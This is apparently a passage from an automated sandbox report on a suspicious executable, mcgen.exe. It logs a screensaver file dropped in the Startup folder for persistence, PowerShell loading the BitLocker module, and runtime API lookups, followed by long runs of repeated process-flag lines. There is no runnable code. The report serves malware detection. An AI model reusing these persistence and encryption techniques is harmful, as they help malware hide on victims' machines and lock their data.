Source: C:\Users\user\Desktop\mcgen.exe

File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr

Jump to behavior

Source: C:\Users\user\Desktop\mcgen.exe

File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\Desktop\mcgen.exe

Code function: 0_2_00007FF6B9F15820 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,

0_2_00007FF6B9F15820

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
